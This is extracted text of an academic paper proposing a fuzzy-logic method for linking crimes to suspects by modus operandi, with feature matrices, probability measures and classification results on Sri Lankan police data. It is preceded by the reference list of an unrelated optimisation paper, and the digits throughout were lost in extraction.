study (princeton series in applied mathematics). princeton: princeton university press. triantafyllidis and papageorgiou ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. bertsimas d, tsitsiklis j. . introduction to linear optimization. third printing edition. nashua: athena scientific. bisschop j, roelofs m. . aimms language reference. version . . paragon decision technology. available at https://aimms.com/english/developers/resources/manuals/ language-reference/ . cohen mc, leung nhz, panchamgam k, perakis g, smith a. . the impact of linear optimization on promotion planning. operations research ( ): – doi . /opre. . . dunning i, huchette j, lubin m. . jump: a modeling language for mathematical optimization. siam review ( ): – doi . / m . erik e, christian h, markus i, david m, sandra f, gregor t, henning b, günter w, jens-uwe r. . mosaic—enabling large-scale equation-based flow sheet optimization. chemie ingenieur technik ( ): – doi . /cite. . fourer r, gay d, kernighan b. . ampl: a modeling language for mathematical programming. south san francisco: the scientific press. hart we, laird cd, watson j-p, woodruff dl, hackebeil ga, nicholson bl, siirola jd. . pyomo—optimization modeling in python. second edition. vol. . berlin: springer science & business media. hart we, watson j-p, woodruff dl. . pyomo: modeling and solving mathematical programs in python. mathematical programming computation ( ): – doi . /s - - - . jackson m. . aspects of abstraction in software development. software & systems modeling ( ): – doi . /s - - - . kallrath j. . modeling languages in mathematical optimization (applied opti- mization). norwell: kluwer academic publishers. knuth de. . literate programming. computer journal ( ): – doi . /comjnl/ . . . kratica j, dugošija d, savić a. . a new mixed integer linear programming model for the multi level uncapacitated facility location problem. applied mathematical modelling ( ): – doi . /j.apm. . . . leek jt, peng rd. . opinion: reproducible research can still be wrong: adopting a prevention approach. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . liu s, papageorgiou lg. . fair profit distribution in multi-echelon supply chains via transfer prices. omega : – doi . /j.omega. . . . lubin m, dunning i. . computing in operations research using julia. informs journal on computing ( ): – doi . /ijoc. . . mccarl ba, meeraus a, van der eijk p, bussieck m, dirkse s, steacy p, nelissen f. . mccarl expanded gams user guide, gams release . . . washington, d.c., usa. melas in, samaga r, alexopoulos lg, klamt s. . detecting and removing incon- sistencies between experimental data and signaling network topologies using integer triantafyllidis and papageorgiou ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://aimms.com/english/developers/resources/manuals/language-reference/ https://aimms.com/english/developers/resources/manuals/language-reference/ http://dx.doi.org/ . /opre. . http://dx.doi.org/ . / m http://dx.doi.org/ . /cite. http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /comjnl/ . . http://dx.doi.org/ . /j.apm. . . http://dx.doi.org/ . /pnas. http://dx.doi.org/ . /j.omega. . . http://dx.doi.org/ . /ijoc. . http://dx.doi.org/ . /peerj-cs. linear programming on interaction graphs. plos computational biology ( ): – doi . /journal.pcbi. . mitsos a, melas in, siminelakis p, chairakaki ad, saez-rodriguez j, alexopoulos lg. . identifying drug effects via pathway alterations using an integer linear programming optimization formulation on phosphoproteomic data. plos com- putational biology ( ): – doi . /journal.pcbi. . mouha n, wang q, gu d, preneel b. . differential and linear cryptanalysis using mixed-integer linear programming. in: wu c-k, yung m, lin d, eds. information security and cryptology: th international conference, inscrypt , beijing, china, november –december , . revised selected papers. berlin, heidelberg: springer berlin heidelberg, – doi . / - - - - _ . nature methods editorial board. . software with impact. nature methods ( ) doi . /nmeth. . nicholson b, siirola jd, watson j-p, zavala vm, biegler lt. . pyomo.dae: a modeling and automatic discretization framework for optimization with differential and algebraic equations. mathematical programming computation ( ): – doi . /s - - - . nikolić dd. . dae tools: equation-based object-oriented modelling, simulation and optimisation software. peerj computer science :e doi . /peerj-cs. . romeijn he, ahuja rk, dempsey jf, kumar a. . a new linear programming approach to radiation therapy treatment planning problems. operations research ( ): – doi . /opre. . . rossum g. . python reference manual. technical report. cwi (centre for mathe- matics and computer science), amsterdam, the netherlands. silva jc, bennett l, papageorgiou lg, tsoka s. . a mathematical programming approach for sequential clustering of dynamic networks. the european physical journal b ( ): doi . /epjb/e - - . sitek p, wikarek j. . a hybrid framework for the modelling and optimisation of decision problems in sustainable supply chain management. international journal of production research ( ): – doi . / . . . tanveer m. . robust and sparse linear programming twin support vector machines. cognitive computation ( ): – doi . /s - - - . triantafyllidis cp, koppelaar rh, wang x, van dam kh, shah n. . an integrated optimisation platform for sustainable resource and infrastructure planning. environ- mental modelling & software : – doi . /j.envsoft. . . . williams hp. . model building in mathematical programming. th edition. london: wiley. yang l, liu s, tsoka s, papageorgiou lg. . mathematical programming for piecewise linear regression analysis. expert systems with applications : – doi . /j.eswa. . . . triantafyllidis and papageorgiou ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /journal.pcbi. http://dx.doi.org/ . /journal.pcbi. http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /nmeth. http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /opre. . http://dx.doi.org/ . /epjb/e - - http://dx.doi.org/ . / . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.envsoft. . . http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /peerj-cs. submitted november accepted may published june corresponding author mahawaga arachchige pathum chamikara, pathumchamikara@gmail.com academic editor sebastian ventura additional information and declarations can be found on page doi . /peerj-cs. copyright chamikara et al. distributed under creative commons cc-by . open access fuzzy based binary feature profiling for modus operandi analysis mahawaga arachchige pathum chamikara , , akalanka galappaththi , roshan dharshana yapa , , ruwan dharshana nawarathna , , saluka ranasinghe kodituwakku , , jagath gunatilake , , aththanapola arachchilage chathranee anumitha jayathilake and liwan liyanage postgraduate institute of science (pgis), university of peradeniya, peradeniya, sri lanka faculty of science, university of peradeniya, peradeniya, sri lanka school of computing, engineering and mathematics, university of western sydney, western sydney, nsw, australia abstract it is a well-known fact that some criminals follow perpetual methods of operations known as modi operandi. modus operandi is a commonly used term to describe the habits in committing crimes. these modi operandi are used in relating criminals to crimes for which the suspects have not yet been recognized. this paper presents the design, implementation and evaluation of a new method to find connections between crimes and criminals using modi operandi. the method involves generating a feature matrix for a particular criminal based on the flow of events of his/her previous convictions. then, based on the feature matrix, two representative modi operandi are generated: complete modus operandi and dynamic modus operandi. these two representative modi operandi are compared with the flow of events of the crime at hand, in order to generate two other outputs: completeness probability (cp) and deviation probability (dp). cp and dp are used as inputs to a fuzzy inference system to generate a score which is used in providing a measurement for the similarity between the suspect and the crime at hand. the method was evaluated using actual crime data and ten other open data sets. in addition, comparison with nine other classification algorithms showed that the proposed method performs competitively with other related methods proving that the performance of the new method is at an acceptable level. subjects algorithms and analysis of algorithms, artificial intelligence, data mining and machine learning keywords modus operandi analysis, fuzzy inference systems, binary feature analysis, classification, association rule mining introduction scientists have long played a role in examining deviant behavior in society. ‘‘deviance behaviour’’ is a term used by scientists to refer to some form of ‘‘rule-breaking’’ behaviour (holdaway, ). it can be the behaviour of violating a social norm or the law. criminal behaviour is also a form of deviance, one that is defined as the breaking of legal rules. nevertheless, there is a difference between deviance and crime. deviance involves breaking a norm and evoking a negative reaction from others. crime is a deviance that how to cite this article chamikara et al. ( ), fuzzy based binary feature profiling for modus operandi analysis. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:pathumchamikara@gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. breaks a law, which is a norm stipulated and enforced by government bodies (holdaway, ). however, crimes negatively affect society. therefore, law enforcement authorities take necessary actions to mitigate crimes in an environment where high crime frequencies are observed each year. in this exercise, the application of technology for crime analysis is being widened in the world. locard’s exchange principle states that every contact of the perpetrators of a crime scene leaves a trace. the perpetrators will both bring something into the scene and leave with something from the scene (chisum & turvey, ). however, the cognitive abilities of criminals will always make them minimize their risks of apprehension by conducting the perfect crime and maximizing their gain (paternoster & bachman, ). modus operandi or method of operation such as preparation actions, crime methods and weapons are frequently used in criminal profiling because the past crime trends show that, after criminals get used to a certain method of operation, they try to use the same modus operandi in committing his/her next crime (palmiotto, ). the criminals develop a set of actions during the performance of a series of crimes which we refer to as ‘‘modus operandi’’ (mo). mo is developed with the crimes he/she commits and the nature of trying to stick with the developed mo that has worked throughout the previous crimes (douglas & douglas, ). in any criminal career, the mo happens to evolve, no matter what the circumstances. also, it is a common behaviour that serial offenders tend to exhibit significant behaviour known as his/her signature. therefore, mos of criminals play a major role in investigating crimes (douglas & douglas, ). it is a known fact that features such as criminal signature and physical appearance are used in crime investigations in almost all the police departments around the world. sri lanka police also use mos of criminals to identify the suspects who have conducted crimes. currently sri lanka police use a manual crime recording and investigation system. this manual system has many problems such as data redundancy, inefficiency, tediousness, inability to support crime investigation and many other problems which are associated with a conventional manual system. to overcome these problems, a web-based framework was proposed with geographical information support containing a centralized database for crime data storage and retrieval, named sl-cidss: sri lanka crime investigation decision support system (chamikara et al., ). the proposed system accompanies a collection of data mining algorithms which effectively support the crime investigation process. fuzzy based binary feature profiling (bfpm) for modus operandi analysis is one novel algorithm which is integrated with the system to provide an effective way to find the similarity between crimes and criminals. according to the penal code of sri lanka first enacted in and amended subsequently several times in later years (the ‘lectric law library, ), sri lanka police classifies crimes into two categories: grave crimes and minor offences. until , grave crimes were classified under crime categories and in another new crime categories were introduced, making it categories of grave crime types. kidnapping, fraud or mischief causing damage greater than , rupees, burglary, grievous hurt, hurt by sharp weapon, homicide, rape, robbery, cheating by trust, theft are of the most frequent crime types. to identify the patterns involved in crimes, a collection of subtypes were identified under these crime types. these subtypes have been created mainly for the purpose of modus chamikara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure relationship between main crime type, subtypes and crime flows. operandi analysis. most frequent behaviors of criminals/crimes are considered as crime subtypes. when a crime is logged in the grave crime record (gcr) book, it is classified under one of the main categories. but, under the section of ‘‘nature of crime’’ in the gcr book, the police officers record the flow of the crime incident including the subtypes. a subtype is a sub category of one of the main crime types. for investigation, the nature of the crime is broken into subtypes and flows according to their frequency of occurrence and uniqueness. these sub categorizations have been introduced mainly to minimize the broadness of main type and to improve clarity. figure depicts the relationship of the subtypes and flows where there can be a flow of events to a crime recorded as one of the main crime types. for the simplicity and easy handling of data, the investigators have provided subtype codes and flow codes. the flow of events provides a modus operandi which is most of the time unique to an offender. each subtype is provided with a code under the main type, to make the crime investigation process easier. for example, rob/s denotes a subtype that is highway robbery; here rob denotes the main type under which the corresponding subtype appears. in this case, it is robbery. crime types are further subdivided into sub types to make the analysis and processing simpler. in this manner, crime subtypes and flows have been identified under all the crime types. the space for adding more subtypes and flows under these crime types exists. a new subtype or a flow is introduced to a particular main crime, if the same subtype or the flow happens to persist for a prolonged time. this paper proposes a novel method of criminal profiling using modus operandi which can be used to identify associations between crimes and criminals. the method is based on a new technique named, ‘‘binary feature vector profiling.’’ key relationships between a criminal and the previous convictions are analyzed using binary feature profiling and association rule mining techniques. due to the impreciseness and vagueness of these extracted attributes, a fuzzy inference system is used in making the final decision. the newly proposed method was adapted into a classification algorithm in order to test its accuracy. an actual crime data set was used in testing the performance of the newly proposed method and it was compared against nine well-established classification algorithms using ten open data sets. the results confirmed that the proposed method produce competitive results compared to the other nine classification algorithms. chamikara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the rest of the paper is organized as follows. the related work section presents a summary of the work that has been conducted on modus operandi analysis as well as a brief discussion on crime investigation using link analysis and association mining in general. the materials and methods section discusses the main steps of the newly proposed algorithm. next, the results and discussion section provides a validation and performance evaluation of the newly proposed method along with a performance comparison with nine other classification algorithms. finally, some concluding remarks and future enhancements are outlined in the conclusion section. related work literature shows many methods which have been developed in the area of automated crime investigation. our major concern has been laid upon the research carried out on crime investigation using association mining as our research considers on developing a model to find the associations between the criminals and the crimes depending on the modes operandi. bennell & canter ( ) have proposed a method to use statistical models to test directly the police practice of utilizing modus operandi to link crimes to a common offender. the results indicated that certain features such as the distance between burglary locations, lead to high levels of predictive accuracy. bennell & jones ( ) have tried to determine if readily available information about commercial and residential serial burglaries, in the form of the offender’s modus operandi, provides a statistically significant basis for accurately linking crimes committed by the same offenders. leclerc, proulx & beauregard ( ) have reviewed the theoretical, empirical, and practical implications related to the modus operandi of sexual offenders against children. they have presented the rational choice perspective in criminology followed by descriptive studies aimed specifically at providing information on modus operandi of sexual offenders against children. clustering crimes, finding links between crimes, profiling offenders and criminal network detection are some of the common areas where data mining is applied in crime analysis (oatley & ewwart, ; king & sutton, ; borg et al., ). association analysis, classification and prediction, cluster analysis, and outlier analysis are some of the traditional data mining techniques which can be used to identify patterns in structured data. offender profiling is a methodology which is used in profiling unknown criminals or offenders. the purpose of offender profiling is to identify the socio-demographic characteristics of an offender based on information available at the crime scene (mokros & alison, ; canter et al., ). association rule mining discovers the items in databases which occur frequently and present them as rules. since this method is often used in market basket analysis to find which products are bought with what other products, it can also be used to find associated crimes conducted with what other crimes. here, the rules are mainly evaluated by the two probability measures, support and confidence (agrawal, imielinkski & swami, ; yi et al., ). association rule mining can also be used to identify the environmental factors that affect crimes using the geographical references (koperski & han, ). incident association mining and entity association mining are two applications of association rule mining. incident association mining can be used to find the crimes committed by the same offender and then the unresolved crimes can be linked to find the chamikara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. offender who committed them. therefore, this technique is normally used to solve serial crimes like serial sexual offenses and serial homicides (chen, ). similarity-based association mining and outlier-based association mining are two approaches used in incident association mining. similarity-based association mining is used mainly to compare the features of a crime with the criminal’s behavioral patterns which are referred as modus operandi or behavioral signature. in outlier-based association mining, crime associations will be created on the fact that both the crime and the criminal have the possibility of having some distinctive feature or a deviant behavior (lin & brown, ). entity association mining/link analysis is the task of finding and charting associations between crime entities such as persons, weapons, and organizations. the purpose of this technique is to find out how crime entities that appear to be unrelated at the surface, are actually linked to each other (chen, ). link analysis is also used as one of the most applicable methods in social network analysis (berry & linoff, ) in finding crime groups, gate keepers and leaders (chen et al., ). attribution can be used to link crimes to offenders. if two offences in different places involve the same specific type, those may be readily attributed to the same offender (oatley & ewwart, ).there are three types of link analysis approaches, namely heuristic-based, statistical-based and template-based (chen, ). sequential pattern mining is also a similar technique to association rule mining. this method discovers frequently occurring items from a set of transactions occurred at different times (chen et al., ). deviation detection detects data that deviates significantly from the rest of the data which is analyzed. this is also called outlier detection, and is used in fraud detection (chen et al., ; capozzoli, lauro & khan, ). in classification, the data points will be assigned to a set of predefined classes of data by identifying a set of common properties among them. this technique is often used to predict crime trends. classification needs a reasonably complete set of training and testing data since a high degree of missing data would limit the prediction accuracy (chen et al., ). classification comes under supervised learning method (chen, ; chikersal, poria & cambria, ) which includes methods such as bayesian models, decision trees, artificial neural networks (chen, ) and support vector machines. string comparison techniques are used to detect the similarity between the records. classification algorithms compare the database record pairs and determine the similarity among them. this concept can be used to avoid deceptive offender profiles. information of offenders such as name, address, etc. might be deceptive and therefore the crime database might contain multiple records of the same offender. this makes the process of identification of their true identity difficult (chen et al., ). systems and methods this section provides a description about the systems and methods used in developing the fuzzy based binary feature profiling for modus operandi analysis. first, an overview about how sl-cidss captures the logics of modus operandi is explained. then a detailed description about the steps of the newly proposed algorithm is explained. chamikara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure crime flow entity arrangement in sl-cidss. figure shows how sl-cidss database captures the crime types and subtypes. a crime record has a crime record flow. typically, a crime is committed by a criminal and a particular accused might commit one or more crimes. a crime record can be of one the crime types. a particular crime record will be considered under one main crime type with the highest precedence in the order of seriousness. for example, a crime incident that includes a murder and a robbery will be categorized as a murder though a robbery has also taken place. but in the nature of crime section, all crimes followed by the main type will be stated. therefore, the crime record flow captures all the steps of the crime as a sequence of steps recorded. the crime flows that have been previously registered are mapped under crime flow code. also, a particular crime record instance can contain multiple sub types which are recorded as crime sub type. the special category captures the crimes with special features such as crimes occurring at the same location or retail shop. a crime may involve several special categories which are saved in the crime special category. the accused entity records the information of suspects and accused and they are related to crime through the crime suspect entity. as the first step of the newly employed method, a feature matrix is generated, resulting in a binary matrix representing the crime flows. this binary feature matrix is composed of the binary patterns generated on previous convictions of a particular criminal/suspect. this binary form of the feature matrix provides a provision to direct application of computer algorithms with methods such as apriori based association rule mining. the reduced complexity of the binary feature matrices provides an easy manipulation over the categorical and continuous valued features. figure shows the steps of the proposed mo analysis algorithm. chamikara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure steps of the newly employed algorithm. generating the feature matrix table shows how the feature vectors are generated and provides the way to generate modi operandi of criminals as binary sequences. according to the table, events of the crime scene are observed starting from its crime type. after a particular crime type is identified, the feature vectors are updated with ones for each subtype and flow code that is available in the crime or suspect’s modus operandi. the vectors will be filled by zeros in places which the modus operandi does not have any contact with. the column names to the feature matrix are generated in such a way that it covers the collection of main types, sub types, crime flows and special categories at hand. for example, if we consider the list of crime types, subtypes, crime flows and the special category in table , it results in -bit feature vectors as shown in the last two columns. in this manner we can produce binary mo patterns based on the crimes committed by different criminals as shown in the last two columns of table . according to table , sus- pect has committed a robbery with the subtypes, abd/s (an abduction of a child from the legal guardian), rob/s (an organized vehicle robbery) and the flows, rob/f (identity cards have been shown), rob/f (accused has been wearing uniforms). suspect has committed a house breaking with the sub type bgl/s (use of stealth), and the flows, bgl/f (entering from the window), bgl/f (removing grills). table shows a feature matrix of binary patterns which is generated by considering the previous convictions of suspect assuming that he has conducted another robbery (conviction ). ct, st, fl and sc in table represent the abbreviations for ‘‘crime type,’’ ‘‘sub type,’’ ‘‘crime flow’’ and ‘‘special category’’ respectively. generating the dynamic mos (dmos) of the criminals dynamic mo is a binary feature vector which is generated on bit patterns of the feature matrix of a particular criminal. the main purpose of the dmo is to obtain a criminal specific crime flow which captures the crime patterns which are frequently followed by a particular criminal. it is named as the dynamic modus operandi as it is subject to change when the new crime flows are added to the feature matrix. therefore, this addresses the changing nature chamikara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table an instance of feature selection for the feature matrix generation. main semantic crime flow element code description suspect suspect crime types hb house breaking hk hurt by knife rb robbery th theft sub types abd/s abduction from the legal guardian abd/s abducting to marry abd/s abducting for sexual harassment bgl/s use of stealth bgl/s burglary in business places rob/s organized vehicle robbery crime flows bgl/f entering from the window bgl/f entering from the fanlights bgl/f removing grills bgl/f breaking glasses rob/f showing identity cards rob/f wearing uniforms rob/f robbery using identity cards, uniforms and chains rob/f seizing inmates rob/f appearing as cid officers special category retailer attacking/robbing retailer ’s stores retailer attacking/robbing retailer ’s stores of the patterns used by the criminals in committing crimes. first, a frequency threshold is generated using characteristic features of the feature matrix at hand which is the matrix of all crimes committed by the same criminal under consideration. the matrix shown in table is an example to a situation of a feature matrix generated on the previous convictions of a criminal. for the sake of simplicity, let’s consider a feature matrix of columns. if we consider a–j of table as crime flow features of the corresponding mos, we can understand that in the first mo the criminal has followed a crime flow of a-e-f-g-i. the same criminal has followed a crime flow of a-d-f-g-i in his second crime. likewise the other two crime flows are, a-e-f-h-i and a-d-f-g-h-i respectively. the dmo of a particular criminal is generated using the apriori method (adamo, ). apriori method is used to find the crime entities with the frequency threshold (frt) which is generated according to eq. ( ). a demonstration of the generation of d in eq. ( ) on the properties of feature matrix is shown in table . d= { d ∣∣∣∣∣d = n∑ i= yi } ( ) frt =md/n ( ) chamikara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table feature matrix for suspect , generated using the selected modus operandi attributes in table . ct ct ct ct st st st st st st fl fl fl fl fl fl fl fl fl sc sc conviction conviction c ham ikara etal. ( ),p eerj c om put.s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table feature matrix generated on four previous convictions of a criminal. a b c d e f g h i j table column-wise addition of the feature matrix of the suspect under consideration. where, d= vector of distinct column frequencies of the feature matrix. yi = cells in each column, md = median of d, n= ∑ f = number of values or total frequencies, c = cumulative frequency of the median class, h= class interval size. the column-wise addition of the matrix shown in table gives , , , , , , , , and . the distinct numbers are selected from the resulting vector which results in d= [ , , , ]. the median of d is then divided by the number of instances (rows) in the matrix as the frt, which is . / = . for the above case. therefore, frt will range from to . this value provides an insight to a fair threshold value for the apriori method to generate the dynamic modus operandi with the most frequent elements. frt is used as the frequency threshold in finding the lengthiest mo with a probability of . because this value suggests that there is a moderate possibility of one feature having . probability in each of mo. this results in a dynamic modus operandi (dmo) as shown in eq. ( ), because the only transaction of crime attributes which provides a support of . is σ(a,f,g,i) as shown in eq. ( ). s= σ(a,f,g,i) |t| = = . ( ) dmo=[ ]. ( ) generating the complete mo profile (cmop) of the criminals the complete mo profile (cmop) is obtained by the or operation between the bits of each column of the feature matrix of the corresponding criminal. cmop guarantees the provision of a composite crime flow by considering all of the previous crime flow entities of a particular criminal. for example, the complete profile for the feature matrix shown in table is obtained as shown in table . therefore, cmop=[ ]. cmop contains s for each place for which a particular crime flow entity has taken place at least once. chamikara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table or operation on the columns to obtain the complete mo profile. finding the deviation probability (dp) of cmop from the crime mo under consideration (umo) first, the deviation of cmop and umo is obtained according to eq. ( ). as the binary feature vectors are commonly used to represent patterns, many methods have been invented to find their similarity and distance (cha, tappert & choi, ). euclidean distance, hamming distance, manhattan distance, jaccard, sorensen and tanimoto are few of the frequently used measures in that domain (cha, tappert & choi, ). this probability value, which is named as the deviation probability (dp), is used to obtain a measurement as to what extent of information is available in the umo, extra to what is already available in the cmop of a particular criminal. let’s assume that the bit pattern to be compared with the suspect’s modus operandi profile under consideration is umo = [ ]. therefore, dp provides the probability of s which are available in umo but not in cmop. the deviation probability, dp can be given as, dp= ∑n i= xi−yi n , for xi= ,yi= ;i= , ,...,n ( ) where, xi=elements of the umo yi=elements of the cmop. if we consider the feature matrix on table , deviation=[ ]−[ ] deviation=[ − − − ]. ( ) define ad= , where ad is the number of positive s. therefore, dp= / = . . as it appears in expression , it produces positive s for the places with the features available in umo but not in cmop. the higher the dp, higher the amount of extra information available in umo. hence, a dp value close to indicates the absence of extra features in umo. finding the completeness probability (cp) of umo against dmo for the same feature matrix which was considered in table , the cp is obtained according to ( ). here, the umo is compared with dmo to obtain a probability to determine what chamikara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure block diagram of the proposed fuzzy inference system. extent of features in cp is available in umo. therefore, it is derived by the percentage of attributes which are present in both umo and dmo. let dmo={xi}ni= and umo= { yj }n j= be two binary sequences. define, zk = { ; xi=yj ; otherwise then, cp= ∑n k= zk n is the completeness probability. ( ) for example, if we consider dmo=[ ], then for the umo= [ ] a cp of / = . is generated as in the st, th and th positions there are ones in both dmo and umo. the higher the cp value, the more the umo is composed of crime flow entities which are available in the dmo. therefore, a cp value close to indicates that the completeness of umo compared to dmo is %. building a fuzzy inference system to obtain the final similarity score the vagueness of the two measurements cp and dp generates a difficulty in calculating a similarity score using crisp logic. therefore, the two parameters cp and dp were adapted into a fuzzy inference system which accepts two inputs and provides a score for the similarity between a suspect and a crime. figure shows a block diagram of the proposed fuzzy inference system. mamdani fuzzy inference was used as an attempt to solve a control problem by a set of linguistic rules obtained from experienced human operators (mamdani & assilina, ). first, the rule base of the fuzzy controller was defined by observing the variations of cp and dp. the membership functions of the inputs and outputs were then adjusted in such a way that the parameters which seem to be wrong can be fine-tuned, which is a common practice in defining fuzzy inference systems (godjevac, ). literature shows many methods used in fine tuning the fuzzy parameters. usage of adaptive networks (sun, ) and neuro-fuzzy systems (abraham, nath & mahanti, ) in fine tuning the fuzzy parameters have received more attention. the problem at our hand was to generate a fuzzy inference system which generates the highest similarity score when the dp value goes down and cp value goes up. we conducted a manual mapping procedure for the fuzzy membership functions. therefore, the input and output space of the two inputs cp and dp and the output were partitioned into subsets. namely, chamikara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure input fuzzy variable : cp. low, moderate and high. center of gravity was used as the defuzzification strategy of the fuzzy controller. mamdani fuzzy inference was especially selected for the similarity score generation procedure, for the highly intuitive knowledge base it offers due to the fact that both antecedents and the consequents of the rules are expressed as linguistic constraints (zadeh, ). first, we selected all of these membership functions with % overlap. then the tuning procedure was conducted during which we adjusted either the left and/or right spread and/or overlapping to get the best possible similarity score for the given dp and cp. this procedure was conducted until the fis generated satisfactory results. figures and show the fuzzy inputs of the fuzzy inference system (fis) which correspond to cp and dp values respectively. figure depicts the fuzzy output of the fis. as the figs. – depict, all the different levels of membership functions under each input and the output are selected to be triangular and trapezoidal functions as triangular or trapezoidal shapes are simple to implement and computationally efficient (mathworks inc, – ). as shown in fig. , the universe of discourse of similarity score (fuzzy output) ranges from to . the defuzzified score which is generated from the fis is considered as the measurement for how close the modus operandi under consideration is to a particular suspect’s profile. a higher score value close to provides a good indication about a high similarity between the modus operandi of the crime and suspect under consideration. the fuzzy rule derivation of the fuzzy controller is heuristic in nature. according to the calculations of the two inputs, higher values of cp, close to and lower values of dp close to , positively affect the final similarity score. the rule base of the fuzzy model is generated accordingly. the rule base provides a non-sparse rule composition of combinations as illustrated in fig. . the rule surface of the fuzzy controller depicted in fig. , shows the variation of the similarity score with the changes of the two inputs cp and dp. according to the figure it’s perfectly visible, for higher values of cp (close to ) and for lower values of dp (close to ), the fuzzy controller generates higher values for the similarity score which are close to . chamikara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure input fuzzy variable : dp. figure output fuzzy variable: similarity score. figure fuzzy rule set of the rule base of the inference system. chamikara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure rule surface of the fuzzy controller. classification of the umo under the class with the highest similarity score when the algorithm is used to find associations between modi operandi of criminals and modi operandi of crimes, the similarity score which is generated from the newly proposed method can be used directly. a similarity score which is close to would suggest that the criminal has a very high tendency to have committed the crime which is under investigation. therefore, the similarity scores can be used to classify a particular modus operandi to a most probable suspect with the highest similarity score. the proposed method was developed by using matlab . . (r a) (mathworks, – a). all the necessary implementations were conducted using the matlab script editor (mathworks, – b) apart from the fis which was implemented using the matlab fuzzy toolbox (mathworks, – c). the nine classification algorithms which were used for the performance comparison were classification algorithms which are already packaged with the weka . . tool (hall et al., ). results and discussion the method was tested with a crime data set obtained from sri lanka police. figure shows the crime frequencies in sri lanka by the crime types from to . it shows only crime types because the five new crime types were introduced in . th column denoting house breaking and theft shows the highest number of occurrences. : theft of property, : robbery, : cheating/misappropriation, : hurt by knife, : homicide, : rape/incest, : grievous hurt, : mischief over rs. , /=, : abduction/kidnapping comes next. for the validation of the algorithm, crime types out of these types were selected for the testing data set. they are, house breaking and theft, theft of property, robbery, homicide, rape/incest, grievous hurt, abduction/kidnapping. a total of crime flows were selected which are common to the seven selected crime types. the data set is also composed of eight sub types and two special categories. altogether the data set consisted of instances in which each instance is composed of attribute values. the data set is distributed over classes (criminals). chamikara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure frequency of different crime types from year – . figure distribution of modus operandi instances over the classes of the dataset. all the tests were performed in a windows computer with intel (r) core (im) i - qm cpu of . ghz and a ram of gb. the histogram of the instance distribution over the classes is shown in fig. . a fold cross validation (refaeilzadeh, tang & liu, ) was used on the data set for a fair testing procedure. in -fold cross validation, the data set is divided into subsets, and the holdout method is repeated times. each time, one of the subsets is used as the test set and the other nine subsets are put together to form a training set. then the average error across all trials is computed (refaeilzadeh, tang & liu, ). the test results of modus operandi classifications in area under curve (auc) (hanley & mcneil, ), and time elapsed for the classification are shown in table . a receiver operating characteristic (roc) curve is a two dimensional graphical illustration of the trade-off between the true positive rate (sensitivity) and false positive rate ( -specificity). chamikara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table results returned by the fuzzy based binary feature profiling for the modus operandi analysis on actual data. data set (number) oversampling or under-sampling value auc average time elapsed . . . . . . n/a . . . . . . . . . . . . . . . . . . . . . . . . figure depicts the roc curve plotted on the classification results obtained by the newly proposed method on the crime data set. in the particular instance which is shown in fig. , all the roc curves related to the crime data set are plotted well over the diagonal line and all of them have retuned auc values which are either equal to or very close to , providing a very good classification. to prepare the data set which was used under this research, a crime data set of around , instances was analyzed. due to the limitations of the real crime data set, it was quite a complex task to prepare a data set with a collection of sufficient modus operandi where each instance has a considerable flow of crime flows. therefore, only a sample of instances could be filtered from the population to generate a representative data set and it was verified by a domain expert before being used in the analysis. as the number of instances was around , it can be considered as an under-represented data sample. another reason for the data set to become under-represented was the challenge in finding classes/criminals with more than one crime committed. the actual crime data set which is used for the testing purposes is imbalanced as it is apparent in fig. . this imbalanced nature of the data set may produce biased results. to make the classification process unbiased, we used the concept of oversampling. oversampling and under-sampling are two concepts which are used in overcoming class imbalance problems in input data sets. oversampling and under-sampling are two different categories of resampling approaches, where in oversampling the small classes are incorporated with repeated instances to make them reach a size close to lager classes, whereas in under-sampling, the number of instances is deceased in such a way that the number of instances reach a size close to the smaller classes (estabrooks, jo & japkowicz, ). chamikara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure roc curves returned by the newly proposed method on the classes of crime data set. table shows the results 